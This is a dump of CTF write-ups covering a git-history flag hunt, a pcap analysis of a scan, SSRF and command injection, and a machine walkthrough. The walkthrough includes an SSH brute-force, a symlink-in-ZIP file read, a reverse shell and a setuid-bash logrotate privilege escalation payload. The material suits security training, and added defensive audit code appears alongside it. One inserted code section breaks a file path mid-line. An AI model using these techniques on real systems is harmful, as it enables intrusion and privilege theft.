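        "hex": lambda t: bytes.fromhex(t),
    }
    results = {}
    for name, decode in attempts.items():
        try:
            text = decode(token).decode("utf-8")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue
        if text and text.isprintable() and text not in results.values():
            results[name] = text
    return results


def scan_history(log_text: str) -> list:
    """Walk `git log -p` output and return (commit, line, encoding, decoded) for every
    token whose decoding is flag-shaped. Removed ('-') lines are scanned too: a secret
    that a later commit deleted is still sitting right there in the history."""
    hits, commit = [], None
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]
            continue
        for token in TOKEN_RE.findall(line):
            for encoding, text in try_decodings(token).items():
                if FLAG_RE.search(text):
                    hits.append((commit, line, encoding, text))
    return hits


def git_log_patch(repo_path: str) -> str:
    """Full history of every ref in a local clone (assumes `git` is on PATH)."""
    return subprocess.run(["git", "-C", repo_path, "log", "-p", "--all"],
                          capture_output=True, text=True, check=True).stdout


# Constructed sample: a note added in the first commit and removed in the next.
SAMPLE_LOG = """\
commit 9f1c2a0d3b4e5f6a7b8c9d0e1f2a3b4c5d6e7f80
Author: sample <sample@example.invalid>

    remove note before publishing

diff --git a/README.md b/README.md
--- a/README.md
+++ b/README.md
@@ -1,2 +1 @@
 # demo
-note: SUNTRF8yMDI0e3NhbXBsZV9ub3RfdGhlX3JlYWxfZmxhZ30=
commit 1a2b3c4d5e6f708192a3b4c5d6e7f8091a2b3c4d
Author: sample <sample@example.invalid>

    initial commit

diff --git a/README.md b/README.md
+++ b/README.md
@@ -0,0 +1,2 @@
+# demo
+note: SUNTRF8yMDI0e3NhbXBsZV9ub3RfdGhlX3JlYWxfZmxhZ30=
"""

if __name__ == "__main__":
    for commit, line, encoding, text in scan_history(SAMPLE_LOG):
        print(f"{commit[:8]}  {encoding:9} {text}    <- {line.strip()}")
```

Against a real clone, replace `SAMPLE_LOG` with `git_log_patch(path)`; `--all` matters because a secret may only survive on a branch or tag that was never merged.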
***Maybe a commit history?***

![alt text](images/figure-7.png)

Clicking on the **Commits** link gives us the commit history:

![alt text](images/figure-8.png)

The commit history contains a Base64-encoded value, which decodes to the flag. Anything committed once stays reachable in the history even after a later commit removes it, which is exactly why the history is worth checking:

![alt text](images/figure-9.png)

**ANSWER**: **`ICSD_2024{J7aLn3XkQ9aB2vV8iRdK}`**

--------------------------------------------------------------------------------
/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-1.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-2.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-3.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-4.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-5.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-6.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-7.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-8.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-9.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C5 - Packet Detective/README.md:
--------------------------------------------------------------------------------
# Packet Detective

In the .pcap file given to you,
an attack path of a malicious user has been captured. Analyze it and answer the questions.

**Question 1.** How many ICMP Echo requests were sent to the target initially?

**Question 2.** Which ports were scanned by the attacker? (Answer format: **port1,port2**, etc. ***in ascending order***)

**Question 3.** Which port was open?

**Question 4.** Which football club’s website was hosted on that port?

**Question 5.** On which port did the attacker host an HTTP server?

**Question 6.** Which attack did the attacker try to conduct? (***Full name, please.***)

**Question 7.** Which port hosted an internal application?

**Question 8.** What is the name of the file containing sensitive information?

**Question 9**. What is the password?
--------------------------------------------------------------------------------
/Who Am I/Writeups/C5 - Packet Detective/Writeup.md:
--------------------------------------------------------------------------------
# Solution

- **Question 1.** How many ICMP Echo requests were sent to the target initially?
    - Filter: **`icmp && ip.src == 192.168.149.131`** (adding `icmp.type == 8` restricts it to echo requests, in case the same host also sent replies)

![alt text](images/figure-1.png)

- ANSWER: **`10`**

---

- **Question 2.** Which ports were scanned by the attacker? (Answer format: **port1,port2**, etc. ***in ascending order***)
    - Packets **27** to **37** are the signature of a port scan.

![alt text](images/figure-2.png)

- The destination ports of the SYN packets sent from 192.168.149.131 tell us which ports were scanned.

- ANSWER: **`22,80,4000,5000,8080`**

---

- **Question 3.** Which port was open?
    - As seen in the port-scan packets, port **`4000`** answered with a **`[SYN, ACK]`** packet.
The attacker then sent a **`RST`**, tearing the connection down without completing the handshake: a half-open (SYN) scan, where a SYN/ACK reply is what marks the port as open and an RST/ACK marks it as closed.

- ANSWER: **`4000`**

---

- **Question 4.** Which football club’s website was hosted on that port?
    - Following the HTTP stream from packet 61 is enough to tell:

![alt text](images/figure-3.png)

- ANSWER: **`Qarabagh`**

---

- **Question 5.** On which port did the attacker host an HTTP server?
    - Packet 105 shows the request made to the attacker’s HTTP server, hosted on port 8888.

![alt text](images/figure-4.png)

- ANSWER: **`8888`**

---

- **Question 6.** Which attack did the attacker try to conduct? (***Full name, please.***)
    - The attacker made the server issue requests on their behalf (to the attacker's own HTTP server and to services on the server's loopback interface), which is the definition of a **Server-Side Request Forgery** attack.

- ANSWER: **`Server-Side Request Forgery`**

---

- **Question 7.** Which port hosted an internal application?
    - The request to port **4455** on localhost succeeded:

![alt text](images/figure-5.png)

- ANSWER: **`4455`**

---

- **Question 8.** What is the name of the file containing sensitive information?
    - Through a command injection vulnerability in the internal application, the attacker read the contents of the file **`github-pass`**:

![alt text](images/figure-6.png)

- ANSWER: **`github-pass`**

---

- **Question 9**. What is the password?
    - Following the HTTP stream for packet 2051:

![alt text](images/figure-7.png)

- ANSWER: **`Mar0j3vic_2024!$`**
--------------------------------------------------------------------------------
/Who Am I/Writeups/C5 - Packet Detective/challenge.pcapng:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C5 - Packet Detective/challenge.pcapng
--------------------------------------------------------------------------------
/Who Am I/Writeups/C5 - Packet Detective/images/figure-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C5 - Packet Detective/images/figure-1.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C5 - Packet Detective/images/figure-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C5 - Packet Detective/images/figure-2.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C5 - Packet Detective/images/figure-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C5 - Packet Detective/images/figure-3.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C5 - Packet Detective/images/figure-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C5 - Packet
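The same triage, as an added example that is not part of the original writeup: the Wireshark filters above redone as plain Python over a reduced packet list, so the scan summary and the SSRF targets can be re-derived without clicking through streams. The packet list is constructed to match what the writeup reports (ten echo requests, SYNs to 22/80/4000/5000/8080, a SYN/ACK only from 4000, fetches via the server to the attacker's port 8888 and to loopback port 4455); it is not the real `challenge.pcapng`. The target address, the `/fetch?url=` request shape and the packet numbers are assumptions. Against the real capture, the records would come from an export such as `tshark -T fields`.

```python
"""Re-derive the Packet Detective answers from a packet list (added example)."""
from urllib.parse import parse_qs, urlsplit

ATTACKER = "192.168.149.131"      # from the writeup's Wireshark filter
TARGET = "192.168.149.140"        # assumed: the writeup does not name the target address


def tcp(no, src, dst, sport, dport, flags, payload=b""):
    """Flags use tshark-style letters: S=SYN, A=ACK, R=RST, P=PSH."""
    return {"no": no, "proto": "tcp", "src": src, "dst": dst,
            "sport": sport, "dport": dport, "flags": flags, "payload": payload}


def icmp(no, src, dst, icmp_type):
    return {"no": no, "proto": "icmp", "src": src, "dst": dst, "type": icmp_type}


# Constructed capture, reduced to the fields the checks need (not the real pcapng).
PACKETS = (
    [icmp(i, ATTACKER, TARGET, 8) for i in range(1, 11)]         # 10 echo requests...
    + [icmp(i + 10, TARGET, ATTACKER, 0) for i in range(1, 11)]  # ...and their replies
    + [
        tcp(27, ATTACKER, TARGET, 40001, 22, "S"),
        tcp(28, TARGET, ATTACKER, 22, 40001, "RA"),
        tcp(29, ATTACKER, TARGET, 40002, 80, "S"),
        tcp(30, TARGET, ATTACKER, 80, 40002, "RA"),
        tcp(31, ATTACKER, TARGET, 40003, 4000, "S"),
        tcp(32, TARGET, ATTACKER, 4000, 40003, "SA"),            # only the open port answers SYN/ACK
        tcp(33, ATTACKER, TARGET, 40003, 4000, "R"),             # scanner tears it down: half-open scan
        tcp(34, ATTACKER, TARGET, 40004, 5000, "S"),
        tcp(35, TARGET, ATTACKER, 5000, 40004, "RA"),
        tcp(36, ATTACKER, TARGET, 40005, 8080, "S"),
        tcp(37, TARGET, ATTACKER, 8080, 40005, "RA"),
        tcp(105, ATTACKER, TARGET, 40100, 4000, "PA",
            b"GET /fetch?url=http://192.168.149.131:8888/x HTTP/1.1\r\nHost: target\r\n\r\n"),
        tcp(300, ATTACKER, TARGET, 40101, 4000, "PA",
            b"GET /fetch?url=http://127.0.0.1:4455/ HTTP/1.1\r\nHost: target\r\n\r\n"),
    ]
)


def icmp_echo_requests(pkts, src):
    """Question 1: echo requests (type 8) from `src`. The writeup's filter would also
    count any echo replies that host sent, so the type check is the safer form."""
    return sum(1 for p in pkts if p["proto"] == "icmp" and p["src"] == src and p["type"] == 8)


def syn_scan_summary(pkts, scanner):
    """Questions 2 and 3: ports probed with a bare SYN, and which of them replied
    SYN/ACK (open) versus RST (closed)."""
    probed, opened = set(), set()
    for p in pkts:
        if p["proto"] != "tcp":
            continue
        if p["src"] == scanner and p["flags"] == "S":
            probed.add(p["dport"])
        elif p["dst"] == scanner and p["flags"] == "SA" and p["sport"] in probed:
            opened.add(p["sport"])
    return {"scanned": sorted(probed), "open": sorted(opened), "closed": sorted(probed - opened)}


def ssrf_candidates(pkts, attacker):
    """Questions 5-7: HTTP requests whose query string carries a URL aimed at the
    server's own loopback or back at the attacker. Either way the server is being
    used as a proxy, which is the SSRF signature."""
    hits = []
    for p in pkts:
        if p["proto"] != "tcp" or not p["payload"].startswith(b"GET "):
            continue
        path = p["payload"].split(b" ", 2)[1].decode("ascii", "replace")
        for param, values in parse_qs(urlsplit(path).query).items():
            for value in values:
                u = urlsplit(value)
                if u.scheme and u.hostname in {"127.0.0.1", "localhost", "::1", attacker}:
                    hits.append({"pkt": p["no"], "param": param, "host": u.hostname,
                                 "port": u.port, "to_attacker": u.hostname == attacker})
    return hits


if __name__ == "__main__":
    print("echo requests:", icmp_echo_requests(PACKETS, ATTACKER))
    print("scan:", syn_scan_summary(PACKETS, ATTACKER))
    for hit in ssrf_candidates(PACKETS, ATTACKER):
        print("ssrf:", hit)
```

The `to_attacker` flag separates the two SSRF phases seen in the capture: a fetch pointed back at the attacker's listener confirms the server will make outbound requests at all, and the loopback fetch is the actual pivot into the internal application.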
Detective/images/figure-4.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C5 - Packet Detective/images/figure-5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C5 - Packet Detective/images/figure-5.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C5 - Packet Detective/images/figure-6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C5 - Packet Detective/images/figure-6.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C5 - Packet Detective/images/figure-7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C5 - Packet Detective/images/figure-7.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/README.md:
--------------------------------------------------------------------------------

# Exorcising Sukuna’s Curse

*The network has been cursed by Sukuna’s influence. As a jujutsu sorcerer, you must help Yuta track down the cursed flags hidden within the system, each like one of Sukuna’s fingers. Uncover the full extent of the breach and aid Yuta in defeating the King of Curses before the network falls.
Can you exorcise Sukuna’s curse in time?*

![image.png](images/imagee.png)
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/Writeup.md:
--------------------------------------------------------------------------------

### **Exorcising Sukuna’s Curse**

![photo_5451743980887859735_x.jpg](images/image%2001.jpg)

---

## CONNECTION

Let’s start the machine and connect with OpenVPN.

```bash
sudo openvpn prolab-user_1.ovpn
```

![image.png](images/image%2002.png)

---

## ENUMERATION

- NMAP SCAN

```bash
nmap -sC -sV -p- --min-rate 5000 10.20.17.70
```

![image.png](images/image.png)

The initial Nmap scan reveals two open ports: FTP on 21 and SSH on 22. The script output also shows that anonymous FTP login is allowed, so we continue enumerating over FTP.

- FTP LOGIN

```bash
ftp 10.20.17.70
```

![image.png](images/image%201.png)

The FTP server holds a single file, `system_log.txt`. To read it we switch to `binary` mode, download it with `get`, and open it locally:

```bash
ftp> binary
ftp> get system_log.txt
ftp> exit
```

![image.png](images/image%202.png)

The file gives us a hint: the probable username is `user1`, and since SSH is open, it is the natural target for a password brute-force. We can move on to the next stage.
---

## EXPLOITATION & INITIAL FOOTHOLD

- SSH BRUTE-FORCE

```bash
hydra -l user1 -P rockyou.txt 10.20.17.70 ssh
```

![image.png](images/image%203.png)

Hydra soon finds the user's password, and we log in over SSH for an initial foothold.

![image.png](images/image%2003.png)

---

## PRIVILEGE ESCALATION ( HORIZONTAL )

The first flag is located at `/home/user2/user.txt`, so `user2` is the account we need to move to.

```bash
cat /etc/passwd
```

![image.png](images/image%204.png)

Besides `user2`, the presence of the `www-data` user suggests that a web application is running on the machine.

We list the listening sockets to find the web server's port, and look under `/var/www/html` for the application's location:

```bash
netstat -tulpn
```

![image.png](images/image%2004.png)

We have no permission to read the webapp folder. Port 9090, a common alternative HTTP port, is bound to loopback only (`127.0.0.1:9090`), which is why the earlier Nmap scan did not list it and why we cannot reach it from our machine directly. To reach it, we set up SSH local port forwarding:

```bash
ssh -L 127.0.0.1:4444:127.0.0.1:9090 user1@10.20.17.70
```

![image.png](images/image%205.png)

Explaining the command:

- `-L` requests local port forwarding: connections to a port on our machine are tunnelled through the SSH session.
- `127.0.0.1:4444` is the address and port that will listen on our machine (the bind address is optional and defaults to loopback; the port is required).
- `127.0.0.1:9090` is the destination as seen from the remote host, i.e. the loopback-bound web server.
- `user1@10.20.17.70` is the SSH login used to build the tunnel.

Once the tunnel is up, we can open a web browser and reach the web server at `http://127.0.0.1:4444`.
![image.png](images/image%206.png)

It appears that the Apache web server is running on the machine with directory listing enabled. Let’s take a closer look at the script files.

![image.png](images/image%207.png)

`/uploads`

The directory is empty.

![image.png](images/image%208.png)

`upload.php`

Another hint suggests that we should look into the source code of `upload.php`. Requesting it directly does not reveal anything useful, since the server executes the PHP rather than serving its source.

![image.png](images/image%209.png)

![image.png](images/image%2010.png)

`doc.php`

This PHP script uploads files to the remote machine. Let’s take advantage of it.

To understand how the script behaves, we upload a random file and observe that it only accepts ZIP files.

![image.png](images/image%2011.png)

![image.png](images/image%2012.png)

There are many ways to abuse ZIP handling, but our goal is to read `upload.php`. So we store a symlink inside the archive: if the server extracts it without checking, the extracted link points at the file we want. Because the link is named `zipfile`, with no `.php` extension, Apache serves the target's raw bytes instead of executing it (provided following symlinks is allowed for that directory).

- Create and store a symlink in a ZIP file:

```bash
ln -s /var/www/html/webapp/upload.php zipfile   # symlink pointing at upload.php
zip -y zipfile.zip zipfile                      # -y stores the symlink itself rather than the file it points to
```

![ctf2.png](images/ctf2.png)

![image.png](images/image%2013.png)

![image.png](images/image%2014.png)

![image.png](images/image%2015.png)

A folder is created for the ZIP file and its contents are uploaded to the `/uploads` directory.
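As an added example (not code from the writeup or the challenge), the same archive built with Python's standard library, next to the check the upload handler should have made before extracting anything. `make_symlink_zip` produces what `ln -s` plus `zip -y` produce above; `unsafe_entries` is the server-side gate, rejecting symlink members and path-traversal names instead of trusting the archive. The link target path is taken from the writeup; the member names and `safe_extract`'s temporary destination are assumptions.

```python
"""Symlink-in-ZIP payload and the server-side check that defeats it (added example)."""
import io
import stat
import tempfile
import zipfile


def make_symlink_zip(link_name: str, target: str) -> bytes:
    """Return a ZIP whose single member is a symlink `link_name -> target`,
    equivalent to `ln -s target link_name && zip -y out.zip link_name`."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        info = zipfile.ZipInfo(link_name)
        info.create_system = 3                                   # 3 = Unix: tells unzip to honour the mode bits
        info.external_attr = (stat.S_IFLNK | 0o777) << 16        # Unix mode lives in the high 16 bits
        zf.writestr(info, target)                                # a symlink member's data is its target path
    return buf.getvalue()


def make_plain_zip(name: str, data: bytes) -> bytes:
    """An ordinary single-file archive, for comparison."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(name, data)
    return buf.getvalue()


def unsafe_entries(zip_bytes: bytes) -> list:
    """Members a naive extraction (`unzip`, PHP ZipArchive, ...) would turn into an
    escape: symlinks (this writeup's trick) and names that climb out of the target dir."""
    problems = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            mode = info.external_attr >> 16
            parts = info.filename.split("/")
            if stat.S_ISLNK(mode):
                problems.append(f"{info.filename}: symlink -> {zf.read(info).decode('utf-8', 'replace')}")
            elif info.filename.startswith("/") or ".." in parts:
                problems.append(f"{info.filename}: path traversal")
    return problems


def safe_extract(zip_bytes: bytes, dest=None) -> list:
    """Refuse the whole archive if any member is unsafe; otherwise extract and
    return the member names. `dest` defaults to a fresh temporary directory."""
    problems = unsafe_entries(zip_bytes)
    if problems:
        raise ValueError("refusing to extract: " + "; ".join(problems))
    dest = dest or tempfile.mkdtemp(prefix="safe_extract_")
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        zf.extractall(dest)
        return zf.namelist()


if __name__ == "__main__":
    payload = make_symlink_zip("zipfile", "/var/www/html/webapp/upload.php")
    print(unsafe_entries(payload))
    try:
        safe_extract(payload)
    except ValueError as err:
        print(err)
```

Note that Python's own `extractall` writes a symlink member as a regular file containing the target path, so the check matters most where the extraction is done by `unzip` or a PHP/C library that recreates links; the gate is the same either way.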
![image.png](images/image%2016.png)

![image.png](images/image%2017.png)

The symlink was extracted from the ZIP file, and on clicking it we can now view the source code of `upload.php`:

![image.png](images/image%2018.png)

The script contains a message directing us to the `/.pro_hidden_connectivity` folder.

![image.png](images/image%2019.png)

![image.png](images/image%2020.png)

Here is another PHP script, `rce.php`, which gives Remote Code Execution.

![image.png](images/image%2021.png)

![image.png](images/image%2022.png)

Before we proceed, we start a netcat listener.

![image.png](images/image%2023.png)

We enter a suitable reverse-shell one-liner.

![image.png](images/image%2005.png)

![image.png](images/image%2024.png)

It results in an error during execution. The reason is visible in the page's script: it passes the command through `window.btoa`, which Base64-encodes a string, so the backend expects the command already Base64-encoded.

![image.png](images/image%2025.png)

Let’s Base64-encode the command and execute it again. This time we get a reverse shell as `user2` and can read our first flag.

![image.png](images/image%2026.png)

![image.png](images/image%2027.png)

![image.png](images/image%2028.png)

---

# PRIVILEGE ESCALATION (ROOT)

With a shell as `user2`, we run `linpeas.sh` to look for privilege escalation paths.

Among its output we find a logrotate job in `/etc/cron.d`:

![image.png](images/image%2029.png)

`linpeas.sh` also flags a writable path that is worth a closer look.
![image.png](images/image%2030.png)

Looking through the logrotate configuration files, we find an interesting one named `blackmirror`:

![image.png](images/image%2031.png)

Reading it, we see that its `postrotate` hook runs a script whose path is the weak point:

```bash
/usr/local/bin/postrotate.sh
```

![image.png](images/image%2032.png)

Since `postrotate.sh` is writable by all users (mode `777`), we can replace its contents with commands of our choosing; the cron job runs logrotate as root, so the hook executes with root privileges. Here’s how:

- Overwrite `postrotate.sh` with a payload that creates a setuid shell:

```bash
#!/bin/bash
cp /bin/bash /tmp/bash
chmod +s /tmp/bash
```

Explanation of the malicious script:

- `#!/bin/bash`: specifies that the script should run with Bash.
- `cp /bin/bash /tmp/bash`: copies the system’s `bash` executable to `/tmp`.
- `chmod +s /tmp/bash`: sets the setuid and setgid bits, so the copy executes with the privileges of its owner, which is root once root's logrotate run has created it.

After the next rotation, `/tmp/bash -p` gives us a root shell (`-p` stops bash from dropping the effective UID back to ours). Now we are root!!!
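To turn the `blackmirror` finding into a repeatable check, here is an added example (not from the writeup) that audits logrotate configuration for hook scripts a non-root user could hijack. It extracts the absolute paths inside `prerotate`/`postrotate`/`firstaction`/`lastaction` ... `endscript` blocks and flags any that are group- or world-writable, plus the quieter variant where the script does not exist yet but its directory is writable. The fixture in `demo()` is constructed with `tempfile` to mirror the mode-777 `postrotate.sh` above; against a real host, point `audit_logrotate` at `/etc/logrotate.conf` and `/etc/logrotate.d`.

```python
"""Audit logrotate hook scripts for non-root writability (added example)."""
import os
import re
import stat
import tempfile

# Script blocks logrotate runs as root; everything up to `endscript` is shell.
HOOK_BLOCK = re.compile(
    r"^[ \t]*(?:prerotate|postrotate|firstaction|lastaction|preremove)\b(.*?)^[ \t]*endscript",
    re.S | re.M)
ABS_PATH = re.compile(r"/[^\s;|&<>()]+")


def hook_scripts(config_text: str) -> list:
    """Absolute paths referenced inside the hook blocks of one config file."""
    paths = set()
    for block in HOOK_BLOCK.findall(config_text):
        paths.update(ABS_PATH.findall(block))
    return sorted(paths)


def writable_by_others(path: str) -> bool:
    """True when the group or world write bit is set (mode & 0o022), as with 777 above."""
    return bool(os.stat(path).st_mode & 0o022)


def audit_logrotate(*config_paths: str) -> list:
    """Return (config, script, reason) for each hook a non-root user could hijack."""
    files = []
    for cp in config_paths:
        if os.path.isdir(cp):
            files.extend(os.path.join(cp, f) for f in sorted(os.listdir(cp)))
        elif os.path.isfile(cp):
            files.append(cp)
    findings = []
    for cfg in files:
        with open(cfg, errors="replace") as fh:
            text = fh.read()
        for script in hook_scripts(text):
            if os.path.exists(script):
                if writable_by_others(script):
                    mode = stat.S_IMODE(os.stat(script).st_mode)
                    findings.append((cfg, script, f"script writable by group/others (mode {mode:o})"))
            else:
                parent = os.path.dirname(script)
                if os.path.isdir(parent) and writable_by_others(parent):
                    findings.append((cfg, script, "missing script in a directory others can write"))
    return findings


def demo() -> list:
    """Constructed fixture: one hook script with mode 777 (the writeup's case), one with 755."""
    root = tempfile.mkdtemp(prefix="logrotate_audit_")
    conf_dir = os.path.join(root, "logrotate.d")
    os.mkdir(conf_dir)
    bad, good = os.path.join(root, "postrotate.sh"), os.path.join(root, "safe.sh")
    for path, mode in ((bad, 0o777), (good, 0o755)):
        with open(path, "w") as fh:
            fh.write("#!/bin/bash\necho rotated\n")
        os.chmod(path, mode)
    with open(os.path.join(conf_dir, "blackmirror"), "w") as fh:
        fh.write(f"/var/log/blackmirror.log {{\n    daily\n    postrotate\n        {bad}\n    endscript\n}}\n")
    with open(os.path.join(conf_dir, "app"), "w") as fh:
        fh.write(f"/var/log/app.log {{\n    weekly\n    postrotate\n        /bin/true; {good}\n    endscript\n}}\n")
    return audit_logrotate(conf_dir)


if __name__ == "__main__":
    for cfg, script, reason in demo() + audit_logrotate("/etc/logrotate.conf", "/etc/logrotate.d"):
        print(f"{cfg}: {script}: {reason}")
```

The fix on the defending side is the mirror image of the attack: hook scripts owned by root with mode 755 or stricter, in a directory only root can write.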

![image.png](images/image%2033.png)
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/ctf2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/ctf2.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 01.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 01.jpg
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 02.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 02.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 03.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 03.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 04.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 04.png
-------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 05.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 05.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 1.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 10.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 11.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 11.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 12.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 12.png 
